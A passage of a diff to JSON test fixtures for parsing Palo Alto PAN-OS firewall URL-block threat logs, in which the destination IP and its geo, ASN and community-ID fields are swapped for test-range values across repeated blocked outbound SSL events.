"name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11107,14 +11180,14 @@ "port": 53161, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -11129,7 +11202,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:KhCfFcRk3sovsTfN9pRRfgjsP84=" + "community_id": "1:KzN9yBe1GajBhxZYdTjgpHnuZm8=" } }, "threat_category": "unknown", @@ -11174,8 +11247,8 @@ ], "network": { "community_id": [ - "1:zcJ3HhZj3urz6vGwVhseviLv7kY=", - "1:KhCfFcRk3sovsTfN9pRRfgjsP84=" + "1:JKXDMGEfK+AfPe3Ul2KAa/kGc2E=", + "1:KzN9yBe1GajBhxZYdTjgpHnuZm8=" ], "transport": "tcp", "application": "ssl", @@ -11214,14 +11287,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768384768Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692026700Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -11244,29 +11317,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11282,14 +11354,14 @@ "port": 53162, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -11304,7 +11376,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:hZhkH3fz7n30Q+zsXnQejsna14Q=" + "community_id": "1:HWEgzGI5Q8WqTRuJMK3vn5Onod0=" } }, "threat_category": "unknown", @@ -11349,8 +11421,8 @@ ], "network": { "community_id": [ - "1:DJHoN3ahXiIF4S4aGocL7KS/AhY=", - "1:hZhkH3fz7n30Q+zsXnQejsna14Q=" + "1:RXEMCbVC2LfXOorhhguojcmubrU=", + "1:HWEgzGI5Q8WqTRuJMK3vn5Onod0=" ], "transport": "tcp", "application": "ssl", @@ -11389,14 +11461,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768393648Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692033Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -11419,29 +11491,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11457,14 +11528,14 @@ "port": 53163, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -11479,7 +11550,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:lFuLGvzKiGz77tAPKRWLQ7eIBNw=" + "community_id": "1:TPbW7rUO/+WbcEblP7dzCLCu8ZY=" } }, "threat_category": "unknown", @@ -11524,8 +11595,8 @@ ], "network": { "community_id": [ - "1:oQCUvcNDUq8NlFsOiIljRD/md2E=", - "1:lFuLGvzKiGz77tAPKRWLQ7eIBNw=" + "1:GTM6OCp2mFNQgMCjINUjPrat95c=", + "1:TPbW7rUO/+WbcEblP7dzCLCu8ZY=" ], "transport": "tcp", "application": "ssl", @@ -11564,14 +11635,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768430359Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692039200Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -11594,29 +11665,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11632,14 +11702,14 @@ "port": 53164, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -11654,7 +11724,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:lXgqW6uer7QCnFv+5qVbgX4vM6E=" + "community_id": "1:sor2TQ+B+DVp+u1LE27kNBjsTKY=" } }, "threat_category": "unknown", @@ -11699,8 +11769,8 @@ ], "network": { "community_id": [ - "1:DjIyvY/MLQ8U4RrMwFVhfq30m6g=", - "1:lXgqW6uer7QCnFv+5qVbgX4vM6E=" + "1:Q5C2B7RS/AKSbSz/rM3DBgclAMI=", + "1:sor2TQ+B+DVp+u1LE27kNBjsTKY=" ], "transport": "tcp", "application": "ssl", @@ -11739,14 +11809,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768436804Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692045400Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -11769,29 +11839,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11807,14 +11876,14 @@ "port": 53165, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -11829,7 +11898,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:SDf7YJ4JLx2oja8SY0iCD/f9ZYk=" + "community_id": "1:l9NEvHCWSvnUtakUackIbXWSIgM=" } }, "threat_category": "unknown", @@ -11874,8 +11943,8 @@ ], "network": { "community_id": [ - "1:fsi7g4zFbrFG09Mvo8P/WofCEKc=", - "1:SDf7YJ4JLx2oja8SY0iCD/f9ZYk=" + "1:XMDjE5q1I8QOvv48kKNmjbX2b2M=", + "1:l9NEvHCWSvnUtakUackIbXWSIgM=" ], "transport": "tcp", "application": "ssl", @@ -11914,14 +11983,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768440852Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692084200Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -11944,29 +12013,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11982,14 +12050,14 @@ "port": 53166, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -12004,7 +12072,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:/wf94ECkqPez+fxVgk+3KErtaBQ=" + "community_id": "1:LxZwvu6ao/nOMNrAIMzp8vAMino=" } }, "threat_category": "unknown", @@ -12049,8 +12117,8 @@ ], "network": { "community_id": [ - "1:wICcAfDG87s8YdjIhDgBqv6mTws=", - "1:/wf94ECkqPez+fxVgk+3KErtaBQ=" + "1:7aojTAJejSHQW3ERDqafP1DdGTk=", + "1:LxZwvu6ao/nOMNrAIMzp8vAMino=" ], "transport": "tcp", "application": "ssl", @@ -12089,14 +12157,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768444787Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692088300Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -12119,29 +12187,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12157,14 +12224,14 @@ "port": 53167, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -12179,7 +12246,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:lGMn2sEJLK3qbOX02axD1srH/FY=" + "community_id": "1:RUiMBKQK4uJwkgGvy/lHSKWl7+I=" } }, "threat_category": "unknown", @@ -12224,8 +12291,8 @@ ], "network": { "community_id": [ - "1:L9I6mLjr15WmWcGfC1vPrN0NmY0=", - "1:lGMn2sEJLK3qbOX02axD1srH/FY=" + "1:Ve4ZkzmH8R7lZ6DKyWn68RpdUWQ=", + "1:RUiMBKQK4uJwkgGvy/lHSKWl7+I=" ], "transport": "tcp", "application": "ssl", @@ -12264,14 +12331,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768448623Z", - "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692092300Z", + "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -12294,29 +12361,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { 